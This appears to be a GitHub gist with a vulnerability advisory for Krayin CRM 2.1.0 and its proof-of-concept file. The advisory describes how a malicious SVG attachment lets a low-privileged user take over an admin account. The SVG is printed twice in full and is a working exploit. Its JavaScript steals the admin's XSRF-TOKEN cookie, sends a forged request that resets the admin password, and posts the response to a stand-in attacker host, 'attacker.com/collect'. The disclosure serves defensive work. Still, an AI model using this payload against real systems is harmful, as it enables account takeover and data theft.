shellkraft/Advisory.md

## Advisory.md

      
    Raw
  

              Advisory.md
            
          
    Privilege Escalation via Malicious SVG File

Summary

A security vulnerability has been identified in Krayin CRM 2.1.0 that allows a low-privileged user to escalate privileges by tricking an admin into opening a malicious SVG file. This exploit leverages Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) via SVG to:

Steal the admin’s XSRF token from cookies.
Change the admin’s password without knowing the current password via an unprotected API endpoint.

This could lead to full admin account takeover and data breaches.

Technical Details

Vulnerability Type


CSRF + XSS via SVG File Upload (Stored Client-Side Attack)
Broken Access Control (Password Change Without Current Password)

Affected Component


User Management Module (/admin/settings/users/edit/[ID])
File Upload/Email Attachment Handling (SVG with embedded JavaScript)

Attack Flow


Attacker (low-privilege user) sends an email with a malicious SVG attachment to an admin.
Admin opens the SVG file in a new tab.
JavaScript inside the SVG executes, harvesting the admin's XSRF-TOKEN cookie.
A forged POST request is sent to the CRM’s user management endpoint, changing the admin’s password.
Attacker gains full admin access using the new password.


Proof of Concept (PoC)


Screen recording of the exploit in action:

Exploit Demonstration


Malicious SVG file: svgxss.svg (Attached with this advisory)


Impact


Full Admin Account Takeover: Attacker can reset the admin password and log in.
Data Breach: Access to sensitive CRM data (customer info, transactions, etc.).
Persistence: Attacker can create backdoor accounts or modify system settings.


Root Cause Analysis

Missing SVG Sanitization


The CRM allows SVG files with embedded JavaScript, enabling XSS.

Broken Password Change Logic


The /admin/settings/users/edit endpoint does not enforce current password verification.


Conclusion

This vulnerability poses a critical risk to the CRM’s security, allowing attackers to hijack admin accounts with minimal effort. Immediate action is required to patch the issue and prevent exploitation.

  
## svgxss.svg
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100" viewBox="0 0 100 100">
    <rect width="100" height="100" fill="white"/>
    <text x="10" y="20" font-family="Arial" font-size="10" fill="black">Loading...</text>
    <script type="text/javascript">
    //<![CDATA[
        // Function to extract XSRF token from cookies
        function getCookie(name) {
            const value = `; ${document.cookie}`;
            const parts = value.split(`; ${name}=`);
            if (parts.length === 2) return parts.pop().split(';').shift();
        }

        // Get the XSRF token
        const xsrfToken = getCookie('XSRF-TOKEN');

        // Prepare the form data
        const formData = new FormData();
        formData.append('id', '1');
        formData.append('name', 'Admin Compromised');
        formData.append('email', 'admin@example.com');
        formData.append('password', 'hacked123');  // New password
        formData.append('confirm_password', 'hacked123');  // Confirm new password
        formData.append('role_id', '1');
        formData.append('view_permission', 'global');
        formData.append('groups[]', '1');
        formData.append('status', '1');
        formData.append('_method', 'put');

        // Send the request to change password
        fetch('/admin/settings/users/edit/1', {
            method: 'POST',
            headers: {
                'X-XSRF-TOKEN': decodeURIComponent(xsrfToken),
                'Accept': 'application/json, text/plain, */*',
                'X-Requested-With': 'XMLHttpRequest'
            },
            body: formData
        })
        .then(response => response.json())
        .then(data => {
            // Optional: Send the response to attacker's server
            fetch('https://attacker.com/collect', {
                method: 'POST',
                body: JSON.stringify(data)
            });
        })
        .catch(error => {
            console.error('Error:', error);
        });
    //]]>
    </script>
</svg>
	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100" viewBox="0 0 100 100">
	<rect width="100" height="100" fill="white"/>
	<text x="10" y="20" font-family="Arial" font-size="10" fill="black">Loading...</text>
	<script type="text/javascript">
	//<![CDATA[
	// Function to extract XSRF token from cookies
	function getCookie(name) {
	const value = `; ${document.cookie}`;
	const parts = value.split(`; ${name}=`);
	if (parts.length === 2) return parts.pop().split(';').shift();
	}

	// Get the XSRF token
	const xsrfToken = getCookie('XSRF-TOKEN');

	// Prepare the form data
	const formData = new FormData();
	formData.append('id', '1');
	formData.append('name', 'Admin Compromised');
	formData.append('email', 'admin@example.com');
	formData.append('password', 'hacked123'); // New password
	formData.append('confirm_password', 'hacked123'); // Confirm new password
	formData.append('role_id', '1');
	formData.append('view_permission', 'global');
	formData.append('groups[]', '1');
	formData.append('status', '1');
	formData.append('_method', 'put');

	// Send the request to change password
	fetch('/admin/settings/users/edit/1', {
	method: 'POST',
	headers: {
	'X-XSRF-TOKEN': decodeURIComponent(xsrfToken),
	'Accept': 'application/json, text/plain, /',
	'X-Requested-With': 'XMLHttpRequest'
	},
	body: formData
	})
	.then(response => response.json())
	.then(data => {
	// Optional: Send the response to attacker's server
	fetch('https://attacker.com/collect', {
	method: 'POST',
	body: JSON.stringify(data)
	});
	})
	.catch(error => {
	console.error('Error:', error);
	});
	//]]>
	</script>
	</svg>
No results found